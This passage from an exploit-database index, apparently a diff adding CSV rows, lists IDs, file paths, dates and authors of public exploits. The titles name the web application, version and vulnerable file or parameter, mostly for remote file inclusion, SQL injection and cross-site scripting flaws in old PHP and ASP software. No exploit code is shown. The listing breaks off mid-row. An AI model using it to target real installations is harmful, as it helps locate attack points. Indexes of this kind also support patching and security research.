+28689,exploits/php/webapps/28689.txt,"PHP_news 2.0 - '/admin/catagory.php?language' Remote File Inclusion",2006-09-25,Root3r_H3ll,webapps,php, +28690,exploits/php/webapps/28690.txt,"PHP_news 2.0 - 'creat_news_all.php?language' Remote File Inclusion",2006-09-25,Root3r_H3ll,webapps,php, +28691,exploits/php/webapps/28691.txt,"Quickblogger 1.4 - Remote File Inclusion",2006-09-25,You_You,webapps,php, +28692,exploits/php/webapps/28692.txt,"Phoenix Evolution CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-26,Root3r_H3ll,webapps,php, +28693,exploits/php/webapps/28693.txt,"Phoenix Evolution CMS - '/modules/pageedit/index.php?pageid' Cross-Site Scripting",2006-09-26,Root3r_H3ll,webapps,php, +28701,exploits/php/webapps/28701.txt,"CubeCart 3.0.x - '/admin/nav.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-26,"HACKERS PAL",webapps,php, +28702,exploits/php/webapps/28702.txt,"CubeCart 3.0.x - '/admin/image.php?image' Cross-Site Scripting",2006-09-26,"HACKERS PAL",webapps,php, +28703,exploits/php/webapps/28703.txt,"CubeCart 3.0.x - '/admin/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-26,"HACKERS PAL",webapps,php, +28704,exploits/php/webapps/28704.txt,"CubeCart 3.0.x - 'footer.inc.php?la_pow_by' Cross-Site Scripting",2006-09-26,"HACKERS PAL",webapps,php, +28729,exploits/php/webapps/28729.txt,"phpBB XS 0.58 - Multiple Remote File Inclusions",2006-09-30,xoron,webapps,php, +28730,exploits/php/webapps/28730.txt,"OlateDownload 3.4 - 'details.php?page' SQL Injection",2006-09-29,Hessam-x,webapps,php, +28727,exploits/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Inclusions",2006-09-28,D_7J,webapps,php, +28731,exploits/php/webapps/28731.txt,"OlateDownload 3.4 - 'search.php?query' SQL Injection",2006-09-29,Hessam-x,webapps,php, +28732,exploits/php/webapps/28732.txt,"Yblog - 'funk.php' Cross-Site Scripting",2006-09-30,You_You,webapps,php, +28733,exploits/php/webapps/28733.txt,"Yblog - 'tem.php' Cross-Site Scripting",2006-09-30,You_You,webapps,php, +28734,exploits/php/webapps/28734.txt,"Yblog - 'uss.php' Cross-Site Scripting",2006-09-30,You_You,webapps,php, +29275,exploits/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 - 'SurgeFTPMGR.cgi' Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",webapps,cgi, +29276,exploits/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 - 'ProductDetails.asp' SQL Injection",2006-12-11,ajann,webapps,asp, +28728,exploits/php/webapps/28728.txt,"Geotarget - 'script.php' Remote File Inclusion",2006-09-29,"RaVeR shi mozi",webapps,php, +28708,exploits/php/webapps/28708.txt,"elproLOG MONITOR Webaccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,webapps,php,80 +28709,exploits/php/webapps/28709.txt,"FlashChat 6.0.2 < 6.0.8 - Arbitrary File Upload",2013-10-04,x-hayben21,webapps,php,80 +28711,exploits/php/webapps/28711.txt,"PHP Invoice 2.2 - 'home.php' Cross-Site Scripting",2006-09-26,meto5757,webapps,php, +28712,exploits/php/webapps/28712.txt,"CMS Formulasi 2.07 - Multiple Vulnerabilities",2013-10-04,"Sarahma Security",webapps,php,80 +28714,exploits/php/webapps/28714.txt,"PHPSelect Web Development - 'index.php3' Remote File Inclusion",2006-09-27,rUnViRuS,webapps,php, +29274,exploits/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (1)",2013-10-29,"Marcela Benetrix",webapps,php,80 +28716,exploits/php/webapps/28716.txt,"MKPortal 1.0/1.1 - 'PMPopup.php' Cross-Site Scripting",2006-09-27,HanowarS,webapps,php, +29279,exploits/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent Cross-Site Scripting",2013-10-29,Vulnerability-Lab,webapps,php, +28719,exploits/php/webapps/28719.txt,"Joomla! Component VirtueMart Joomla! eCommerce Edition 1.0.11 - Multiple Input Validation Vulnerabilities",2006-09-27,"Adrian Castro",webapps,php, +28720,exploits/php/webapps/28720.txt,"Web//News 1.4 - 'parser.php' Remote File Inclusion (2)",2006-09-27,ThE-WoLf-KsA,webapps,php, +28721,exploits/php/webapps/28721.txt,"Red Mombin 0.7 - 'index.php' Cross-Site Scripting",2006-09-22,"Armorize Technologies",webapps,php, +28722,exploits/php/webapps/28722.txt,"Red Mombin 0.7 - 'process_login.php' Cross-Site Scripting",2006-09-22,"Armorize Technologies",webapps,php, +28723,exploits/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,webapps,php,80 +28736,exploits/php/webapps/28736.txt,"DeluxeBB 1.09 - 'Sig.php' Remote File Inclusion",2006-10-02,r0ut3r,webapps,php, +28737,exploits/php/webapps/28737.txt,"PHP Web Scripts Easy Banner - 'functions.php' Remote File Inclusion",2006-10-02,"abu ahmed",webapps,php, +28738,exploits/php/webapps/28738.txt,"Digishop 4.0 - 'cart.php' Cross-Site Scripting",2006-10-02,meto5757,webapps,php, +28740,exploits/php/webapps/28740.txt,"HAMweather 3.9.8 - 'template.php' Script Code Injection",2006-10-03,"James Bercegay",webapps,php, +28741,exploits/php/webapps/28741.txt,"Yener Haber Script 1.0/2.0 - SQL Injection",2006-10-04,Dj_ReMix,webapps,php, +28742,exploits/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 - 'Calendar.asp' Cross-Site Scripting",2006-10-27,MizoZ,webapps,asp, +28743,exploits/php/webapps/28743.txt,"osCommerce 2.2 - '/admin/banner_manager.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28744,exploits/php/webapps/28744.txt,"osCommerce 2.2 - '/admin/banner_statistics.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28745,exploits/php/webapps/28745.txt,"osCommerce 2.2 - '/admin/countries.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28746,exploits/php/webapps/28746.txt,"osCommerce 2.2 - '/admin/currencies.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28747,exploits/php/webapps/28747.txt,"osCommerce 2.2 - '/admin/languages.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28748,exploits/php/webapps/28748.txt,"osCommerce 2.2 - '/admin/manufacturers.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28752,exploits/php/webapps/28752.txt,"osCommerce 2.2 - '/admin/products_expected.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28753,exploits/php/webapps/28753.txt,"osCommerce 2.2 - '/admin/reviews.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28754,exploits/php/webapps/28754.txt,"osCommerce 2.2 - '/admin/specials.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28755,exploits/php/webapps/28755.txt,"osCommerce 2.2 - '/admin/stats_products_purchased.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28756,exploits/php/webapps/28756.txt,"osCommerce 2.2 - '/admin/stats_products_viewed.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28757,exploits/php/webapps/28757.txt,"osCommerce 2.2 - '/admin/tax_classes.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28758,exploits/php/webapps/28758.txt,"osCommerce 2.2 - '/admin/tax_rates.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28759,exploits/php/webapps/28759.txt,"osCommerce 2.2 - '/admin/zones.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28761,exploits/php/webapps/28761.txt,"WikyBlog 1.2.x - 'index.php' Remote File Inclusion",2006-10-05,MoHaNdKo,webapps,php, +28762,exploits/asp/webapps/28762.txt,"Civica - 'Display.asp' SQL Injection",2006-10-05,CodeXpLoder'tq,webapps,asp, +28767,exploits/php/webapps/28767.txt,"AckerTodo 4.2 - 'login.php' Multiple SQL Injections",2006-10-06,"Francesco Laurita",webapps,php, +28768,exploits/asp/webapps/28768.html,"Emek Portal 2.1 - 'Uyegiris.asp' SQL Injection",2006-10-06,"Dj ReMix",webapps,asp, +28769,exploits/php/webapps/28769.txt,"Interspire FastFind - 'index.php' Cross-Site Scripting",2006-09-27,MizoZ,webapps,php, +28770,exploits/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection",2006-10-08,disfigure,webapps,php, +28771,exploits/php/webapps/28771.pl,"PHP Polling Creator 1.03 - 'functions.inc.php' Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,webapps,php, +28772,exploits/php/webapps/28772.txt,"ISearch 2.16 - 'ISEARCH_PATH' Remote File Inclusion",2006-10-09,MoHaNdKo,webapps,php, +28773,exploits/php/webapps/28773.txt,"Deep CMS 2.0 - 'index.php' Remote File Inclusion",2006-10-09,Crackers_Child,webapps,php, +28774,exploits/php/webapps/28774.txt,"phpWebSite 0.10.2 - 'PHPWS_SOURCE_DIR' Multiple Remote File Inclusions",2006-10-09,Crackers_Child,webapps,php, +28776,exploits/php/webapps/28776.txt,"EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-10-09,Tamriel,webapps,php, +28777,exploits/php/webapps/28777.txt,"Hastymail 1.x - IMAP SMTP Command Injection",2006-10-10,"Vicente Aguilera Diaz",webapps,php, +28778,exploits/php/webapps/28778.txt,"ironwebmail 6.1.1 - Directory Traversal Information Disclosure",2006-10-16,"Derek Callaway",webapps,php, +28779,exploits/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 - 'Getimg.php' Remote File Inclusion",2006-10-10,DarkFig,webapps,php, +28780,exploits/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 - 'Grid3.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,webapps,php, +28781,exploits/php/webapps/28781.txt,"BlueShoes Framework 4.6 - 'GoogleSearch.php' Remote File Inclusion",2006-10-10,k1tk4t,webapps,php, +28782,exploits/php/webapps/28782.txt,"Tagit2b - 'DelTagUser.php' Remote File Inclusion",2006-10-10,k1tk4t,webapps,php, +28783,exploits/php/webapps/28783.txt,"MySQLDumper 1.21 - 'sql.php' Cross-Site Scripting",2006-10-10,Crackers_Child,webapps,php, +28784,exploits/php/webapps/28784.txt,"Gcards 1.13 - 'Addnews.php' Remote File Inclusion",2006-10-11,"DeatH VirUs",webapps,php, +28786,exploits/php/webapps/28786.pl,"CommunityPortals 1.0 - 'bug.php' Remote File Inclusion",2006-10-11,"Nima Salehi",webapps,php, +28787,exploits/php/webapps/28787.txt,"Dokeos 1.6.4 - Multiple Remote File Inclusions Vulnerabilities",2006-10-11,viper-haCker,webapps,php, +28790,exploits/php/webapps/28790.txt,"phpList 2.x - Public Pages MultipleCross-Site Scripting Vulnerabilities",2006-10-12,"Michiel Dethmers",webapps,php, +28791,exploits/php/webapps/28791.txt,"PHP TopSites FREE 1.022b - 'config.php' Remote File Inclusion",2006-10-12,"Le CoPrA",webapps,php, +28792,exploits/php/webapps/28792.txt,"MamboLaiThai ExtCalThai 0.9.1 - 'admin_events.php?CONFIG_EXT[LANGUAGES_DIR]' Remote File Inclusion",2006-10-12,k1tk4t,webapps,php, +28793,exploits/php/webapps/28793.txt,"MamboLaiThai ExtCalThai 0.9.1 - 'mail.inc.php?CONFIG_EXT[LIB_DIR]' Remote File Inclusion",2006-10-12,k1tk4t,webapps,php, +28794,exploits/php/webapps/28794.txt,"4Images 1.7 - 'details.php' Cross-Site Scripting",2006-10-12,"Christian Marthen",webapps,php, +28795,exploits/php/webapps/28795.php,"FreeWPS 2.11 - 'upload.php' Remote Command Execution",2006-10-12,"HACKERS PAL",webapps,php, +28796,exploits/php/webapps/28796.pl,"Buzlas 2006-1 Full - 'Archive_Topic.php' Remote File Inclusion",2006-09-29,"Nima Salehi",webapps,php, +28797,exploits/php/webapps/28797.txt,"Bloq 0.5.4 - 'index.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,webapps,php, +28798,exploits/php/webapps/28798.txt,"Bloq 0.5.4 - 'admin.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,webapps,php, +28799,exploits/php/webapps/28799.txt,"Bloq 0.5.4 - 'rss.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,webapps,php, +28800,exploits/php/webapps/28800.txt,"Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,webapps,php, +28801,exploits/php/webapps/28801.txt,"Bloq 0.5.4 - 'rdf.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,webapps,php, +28802,exploits/php/webapps/28802.txt,"Bloq 0.5.4 - '/files/mainfile.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,webapps,php, +28803,exploits/php/webapps/28803.txt,"Xoops 2.2.3 - 'search.php' Cross-Site Scripting",2006-10-13,b0rizQ,webapps,php, +28804,exploits/php/webapps/28804.pl,"phpBB Add Name Module - 'Not_Mem.php' Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php, +28807,exploits/php/webapps/28807.py,"WHMCompleteSolution (WHMCS) 5.2.7 - SQL Injection",2013-10-08,localhost.re,webapps,php, +28808,exploits/php/webapps/28808.txt,"WordPress Plugin Quick Contact Form 6.0 - Persistent Cross-Site Scripting",2013-10-08,Zy0d0x,webapps,php, +28814,exploits/php/webapps/28814.txt,"RamaCMS - 'ADODB.Inc.php' Remote File Inclusion",2006-10-13,"Le CoPrA",webapps,php, +28815,exploits/php/webapps/28815.txt,"H-Sphere WebShell 2.x - 'login.php' Cross-Site Scripting",2006-10-14,b0rizQ,webapps,php, +28818,exploits/php/webapps/28818.txt,"Mambo Module MOStlyCE 4.5.4 - 'HTMLTemplate.php' Remote File Inclusion",2006-10-16,The_BeKiR,webapps,php, +28819,exploits/php/webapps/28819.txt,"Lodel CMS 0.7.3 - 'Calcul-page.php' Remote File Inclusion",2006-10-17,The_BeKiR,webapps,php, +28820,exploits/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 - 'index.php' Cross-Site Scripting",2006-10-17,Lostmon,webapps,php, +28821,exploits/php/webapps/28821.txt,"Maintain 3.0.0-RC2 - 'Example6.php' Remote File Inclusion",2006-10-16,ERNE,webapps,php, +28823,exploits/php/webapps/28823.pl,"PowerMovieList 0.13/0.14 - Edit User HTML Injection",2006-10-16,MP,webapps,php, +28824,exploits/php/webapps/28824.txt,"phpList 2.10.2 - 'index.php' Cross-Site Scripting",2006-10-17,b0rizQ,webapps,php, +28825,exploits/php/webapps/28825.txt,"Dev Web Manager System 1.5 - 'index.php' Cross-Site Scripting",2006-10-17,CorryL,webapps,php, +28826,exploits/php/webapps/28826.txt,"Cerberus Helpdesk 3.2.1 - 'Rpc.php' Unauthorized Access",2006-10-18,jonepet,webapps,php, +28827,exploits/php/webapps/28827.txt,"PHP Live Helper 1.17 - Multiple Remote File Inclusions",2006-10-18,Matdhule,webapps,php, +28828,exploits/php/webapps/28828.txt,"Zorum 3.5 - 'DBProperty.php' Remote File Inclusion",2006-10-19,MoHaNdKo,webapps,php, +28829,exploits/asp/webapps/28829.txt,"Kinesis Interactive Cinema System - 'index.asp' SQL Injection",2006-10-18,fireboy,webapps,asp, +28830,exploits/php/webapps/28830.pl,"Free FAQ 1.0 - 'index.php' Remote File Inclusion",2006-10-19,"Alireza Ahari",webapps,php, +28831,exploits/php/webapps/28831.txt,"Simple Machines Forum (SMF) 1.0/1.1 - 'index.php' Cross-Site Scripting",2006-10-19,b0rizQ,webapps,php, +28832,exploits/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Inclusions",2006-10-19,SuBzErO,webapps,php, +28833,exploits/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 - 'config.php' SQL Injection",2006-10-20,G1UK,webapps,php, +28838,exploits/php/webapps/28838.txt,"ClanLite - 'conf-php.php' Remote File Inclusion",2006-10-23,x_w0x,webapps,php, +28839,exploits/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - '/smumdadotcom_ascyb_alumni/mod.php?katalog Module query' Cross-Site Scripting",2006-10-23,MP,webapps,php, +28840,exploits/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - 'mod.php?mod' Traversal Local File Inclusion",2006-10-23,MP,webapps,php, +28842,exploits/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - 'Cat' Cross-Site Scripting",2006-10-23,MC.Iglo,webapps,php, +28843,exploits/php/webapps/28843.txt,"cPanel 10.9 - 'dosetmytheme?theme' Cross-Site Scripting",2006-10-23,Crackers_Child,webapps,php, +28844,exploits/php/webapps/28844.txt,"cPanel 10.9 - 'editzonetemplate?template' Cross-Site Scripting",2006-10-23,Crackers_Child,webapps,php, +28845,exploits/php/webapps/28845.txt,"Shop-Script - Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",webapps,php, +28846,exploits/php/webapps/28846.html,"WikiNi 0.4.x - 'Waka.php' Multiple HTML Injection Vulnerabilities",2006-10-23,"Raphael Huck",webapps,php, +28851,exploits/php/webapps/28851.txt,"Crafty Syntax Live Help 2.9.9 - Multiple Remote File Inclusions",2006-10-24,Crackers_Child,webapps,php, +28854,exploits/multiple/webapps/28854.txt,"Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection",2013-10-10,"Giuseppe D'Amore",webapps,multiple, +28857,exploits/asp/webapps/28857.txt,"Snitz Forums 2000 3.4.6 - 'Pop_Mail.asp' SQL Injection",2006-10-24,"Arham Muhammad",webapps,asp, +28858,exploits/php/webapps/28858.txt,"Simpnews 2.x - 'index.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,webapps,php, +28859,exploits/php/webapps/28859.txt,"Simpnews 2.x - 'pwlost.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,webapps,php, +28861,exploits/php/webapps/28861.txt,"Comment IT 0.2 - 'PathToComment' Remote File Inclusion",2006-10-25,"Cold Zero",webapps,php, +28862,exploits/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - 'Init.php' Remote File Inclusion",2006-10-25,The-0utl4w,webapps,php, +28863,exploits/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - 'user.php' Cross-Site Scripting",2006-10-26,r00t,webapps,php, +28864,exploits/php/webapps/28864.txt,"PHPLeague 0.81 - '/consult/miniseul.php?cheminmini' Remote File Inclusion",2006-10-26,ajaan,webapps,php, +28865,exploits/php/webapps/28865.txt,"PHPTreeView 1.0 - 'TreeViewClass.php' Remote File Inclusion",2006-10-27,"Prince Islam",webapps,php, +28866,exploits/php/webapps/28866.txt,"IG Shop 1.4 - 'Change_Pass.php' Cross-Site Scripting",2006-10-30,SnipEr.X,webapps,php, +28867,exploits/php/webapps/28867.txt,"TorrentFlux 2.1 - 'dir.php' Directory Traversal",2006-10-27,Christopher,webapps,php, +28868,exploits/php/webapps/28868.txt,"PLS-Bannieres 1.21 - 'Bannieres.php' Remote File Inclusion",2006-10-27,Mahmood_ali,webapps,php, +28869,exploits/asp/webapps/28869.txt,"Web Wiz Forum 6.34/7.x - 'search.asp' SQL Injection",2006-10-28,almaster,webapps,asp, +28870,exploits/php/webapps/28870.txt,"PunBB 1.x - SQL Injection",2006-10-30,nmsh_sa,webapps,php, +28871,exploits/php/webapps/28871.txt,"Actionpoll 1.1.1 - '/db/DataReaderWriter.php?CONFIG_DB' Remote File Inclusion",2006-10-30,"Cyber Security",webapps,php, +28872,exploits/php/webapps/28872.txt,"Actionpoll 1.1.1 - '/db/PollDB.php?CONFIG_DATAREADERWRITER' Remote File Inclusion",2006-10-30,"Cyber Security",webapps,php, +28873,exploits/php/webapps/28873.txt,"Exhibit Engine 1.22 - 'fetchsettings.php?toroot' Remote File Inclusion",2006-10-30,"Cyber Security",webapps,php, +28874,exploits/php/webapps/28874.txt,"Exhibit Engine 1.22 - 'fstyles.php?toroot' Remote File Inclusion",2006-10-30,"Cyber Security",webapps,php, +28875,exploits/php/webapps/28875.txt,"Freenews 1.1 - 'Aff_News.php' Remote File Inclusion",2006-10-30,MoHaNdKo,webapps,php, +28878,exploits/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 - 'login.php?Username' SQL Injection",2006-10-30,poplix,webapps,asp, +28879,exploits/asp/webapps/28879.txt,"Evandor Easy notesManager 0.0.1 - Search Page SQL Injection",2006-10-30,poplix,webapps,asp, +28881,exploits/php/webapps/28881.txt,"Foresite CMS - 'Index_2.php' Cross-Site Scripting",2006-10-30,"David Vieira-Kurz",webapps,php, +28882,exploits/php/webapps/28882.txt,"phpFaber CMS 1.3.36 - 'Htmlarea.php' Cross-Site Scripting",2005-10-30,Vigilon,webapps,php, +28883,exploits/php/webapps/28883.txt,"Easy Web Portal 2.1.2 - Multiple Remote File Inclusions",2006-10-31,MEFISTO,webapps,php, +28885,exploits/php/webapps/28885.php,"PHP-Nuke 7.x Journal Module - 'search.php' SQL Injection",2006-10-31,Paisterist,webapps,php, +28886,exploits/php/webapps/28886.txt,"The Search Engine Project 0.942 - 'Configfunction.php' Remote File Inclusion",2006-10-30,"Cyber Security",webapps,php, +28889,exploits/php/webapps/28889.txt,"Netquery 4.0 - 'NQUser.php' Cross-Site Scripting",2006-10-31,"Tal Argoni",webapps,php, +28890,exploits/php/webapps/28890.txt,"iPlanet Messaging Server - Messenger Express Expression() HTML Injection",2006-10-31,LegendaryZion,webapps,php, +28891,exploits/php/webapps/28891.txt,"Mirapoint Web Mail - 'Expression()' HTML Injection",2006-10-31,LegendaryZion,webapps,php, +28892,exploits/php/webapps/28892.txt,"RSSonate - 'Project_Root' Remote File Inclusion",2006-11-01,Arab4services,webapps,php, +28893,exploits/php/webapps/28893.pl,"KnowledgeBuilder 2.2 - 'visEdit_Control.Class.php' Remote File Inclusion",2006-11-08,igi,webapps,php, +28896,exploits/php/webapps/28896.txt,"RunCMS 1.x - Avatar Arbitrary File Upload",2006-11-02,securfrog,webapps,php, +28898,exploits/php/webapps/28898.txt,"FreeWebShop 2.2 - 'index.php' SQL Injection",2006-11-02,Spiked,webapps,php, +28899,exploits/php/webapps/28899.txt,"NewP News Publishing System 1.0 - 'Class.Database.php' Remote File Inclusion",2006-11-07,navairum,webapps,php, +28900,exploits/php/webapps/28900.txt,"ac4p Mobile - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-03,AL-garnei,webapps,php, +28901,exploits/php/webapps/28901.txt,"ac4p Mobile - 'MobileNews.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-03,AL-garnei,webapps,php, +28902,exploits/php/webapps/28902.txt,"ac4p Mobile - 'polls.php' Multiple Cross-Site Scripting Vulnerabilities (1)",2006-11-03,AL-garnei,webapps,php, +28903,exploits/php/webapps/28903.txt,"ac4p Mobile - 'send.php?cats' Cross-Site Scripting",2006-11-03,AL-garnei,webapps,php, +28904,exploits/php/webapps/28904.txt,"ac4p Mobile - 'up.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-03,AL-garnei,webapps,php, +28905,exploits/php/webapps/28905.txt,"ac4p Mobile - '/cp/index.php?pagenav' Cross-Site Scripting",2006-11-03,AL-garnei,webapps,php, +28906,exploits/php/webapps/28906.txt,"Simplog 0.9.3 - 'BlogID' Multiple SQL Injections",2006-11-03,"Benjamin Moss",webapps,php, +28907,exploits/php/webapps/28907.txt,"Simplog 0.9.3 - 'archive.php?PID' Cross-Site Scripting",2006-11-03,"Benjamin Moss",webapps,php, +28908,exploits/php/webapps/28908.txt,"Advanced Guestbook 2.3.1 - 'admin.php' Remote File Inclusion",2006-11-03,BrokeN-ProXy,webapps,php, +28909,exploits/php/webapps/28909.txt,"IF-CMS - 'index.php' Cross-Site Scripting",2006-11-04,"Benjamin Moss",webapps,php, +28910,exploits/php/webapps/28910.pl,"PHPKit 1.6.1 - 'popup.php' SQL Injection",2006-11-04,x23,webapps,php, +28913,exploits/php/webapps/28913.txt,"@cid Stats 2.3 - 'Install.php3' Remote File Inclusion",2006-11-06,Mahmood_ali,webapps,php, +28914,exploits/php/webapps/28914.txt,"Xoops 2.0.5 - 'NewList.php' Cross-Site Scripting",2006-11-06,CvIr.System,webapps,php, +28917,exploits/php/webapps/28917.txt,"AIOCP 1.3.x - 'cp_forum_view.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",webapps,php, +28918,exploits/php/webapps/28918.txt,"AIOCP 1.3.x - 'cp_dpage.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",webapps,php, +28919,exploits/php/webapps/28919.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",webapps,php, +28920,exploits/php/webapps/28920.txt,"AIOCP 1.3.x - 'cp_users_online.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",webapps,php, +28921,exploits/php/webapps/28921.txt,"AIOCP 1.3.x - 'cp_links_search.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",webapps,php, +28922,exploits/php/webapps/28922.txt,"AIOCP 1.3.x - 'load_page' Remote File Inclusion",2006-11-06,"laurent gaffie",webapps,php, +28923,exploits/php/webapps/28923.txt,"AIOCP 1.3.x - 'cp_dpage.php' SQL Injection",2006-11-06,"laurent gaffie",webapps,php, +28924,exploits/php/webapps/28924.txt,"AIOCP 1.3.x - 'cp_news.php' SQL Injection",2006-11-06,"laurent gaffie",webapps,php, +28925,exploits/php/webapps/28925.txt,"AIOCP 1.3.x - 'cp_forum_view.php' SQL Injection",2006-11-06,"laurent gaffie",webapps,php, +28926,exploits/php/webapps/28926.txt,"AIOCP 1.3.x - 'cp_edit_user.php' SQL Injection",2006-11-06,"laurent gaffie",webapps,php, +28927,exploits/php/webapps/28927.txt,"AIOCP 1.3.x - 'cp_newsletter.php' SQL Injection",2006-11-06,"laurent gaffie",webapps,php, +28928,exploits/php/webapps/28928.txt,"AIOCP 1.3.x - 'cp_links.php' SQL Injection",2006-11-06,"laurent gaffie",webapps,php, +28929,exploits/php/webapps/28929.txt,"AIOCP 1.3.x - 'cp_contact_us.php' SQL Injection",2006-11-06,"laurent gaffie",webapps,php, +28930,exploits/php/webapps/28930.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' SQL Injection",2006-11-06,"laurent gaffie",webapps,php, +28931,exploits/php/webapps/28931.txt,"AIOCP 1.3.x - 'cp_login.php' SQL Injection",2006-11-06,"laurent gaffie",webapps,php, +28932,exploits/php/webapps/28932.txt,"AIOCP 1.3.x - 'cp_users_online.php' SQL Injection",2006-11-06,"laurent gaffie",webapps,php, +28933,exploits/php/webapps/28933.txt,"AIOCP 1.3.x - 'cp_codice_fiscale.php' SQL Injection",2006-11-06,"laurent gaffie",webapps,php, +28934,exploits/php/webapps/28934.txt,"AIOCP 1.3.x - 'cp_links_search.php' SQL Injection",2006-11-06,"laurent gaffie",webapps,php, +28935,exploits/php/webapps/28935.txt,"AIOCP 1.3.x - Multiple Vulnerabilities",2006-11-06,"laurent gaffie",webapps,php, +28936,exploits/php/webapps/28936.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Full Path Disclosure",2006-11-06,"laurent gaffie",webapps,php, +28937,exploits/php/webapps/28937.txt,"AIOCP 1.3.x - 'cp_show_page_help.php' Full Path Disclosure",2006-11-06,"laurent gaffie",webapps,php, +28938,exploits/php/webapps/28938.txt,"IPManager 2.3 - 'index.php' Cross-Site Scripting",2006-11-07,spaceballyopsolo,webapps,php, +28939,exploits/php/webapps/28939.txt,"Kayako SupportSuite 3.0.32 - 'index.php' Cross-Site Scripting",2006-11-07,Dr.HAiL,webapps,php, +28940,exploits/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 - 'Languages.Lib.php' Local File Inclusion",2006-11-08,ajann,webapps,php, +28941,exploits/asp/webapps/28941.txt,"Immediacy .NET CMS 5.2 - 'Logon.aspx' Cross-Site Scripting",2006-11-08,"Gemma Hughes",webapps,asp, +28942,exploits/php/webapps/28942.txt,"FreeWebShop 2.1/2.2 - 'index.php?page' Traversal Arbitrary File Access",2006-11-08,"laurent gaffie",webapps,php, +28943,exploits/php/webapps/28943.txt,"FreeWebShop 2.1/2.2 - 'index.php?cat' Cross-Site Scripting",2006-11-08,"laurent gaffie",webapps,php, +28944,exploits/php/webapps/28944.txt,"Abarcar Realty Portal 5.1.5/6.0.1 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",webapps,php, +28945,exploits/php/webapps/28945.txt,"PHPMyChat Plus 1.9 - Multiple Local File Inclusions",2006-11-08,ajann,webapps,php, +28946,exploits/php/webapps/28946.txt,"Portix-PHP 0.4.2 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",webapps,php, +28947,exploits/php/webapps/28947.txt,"Speedywiki 2.0/2.1 - Multiple Input Validation Vulnerabilities",2006-11-08,"laurent gaffie",webapps,php, +28949,exploits/php/webapps/28949.txt,"bitweaver 1.x - '/newsletters/edition.php?tk' SQL Injection",2006-11-09,"laurent gaffie",webapps,php, +28950,exploits/php/webapps/28950.txt,"LandShop 0.6.3 - 'ls.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-09,"laurent gaffie",webapps,php, +28951,exploits/php/webapps/28951.txt,"LandShop 0.6.3 - 'ls.php' Multiple SQL Injections",2006-11-09,"laurent gaffie",webapps,php, +28952,exploits/php/webapps/28952.txt,"Omnistar Article Manager - Multiple SQL Injections",2006-11-09,"Benjamin Moss",webapps,php, +28953,exploits/php/webapps/28953.txt,"Bitweaver 1.x - '/blogs/list_blogs.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",webapps,php, +28954,exploits/php/webapps/28954.txt,"Bitweaver 1.x 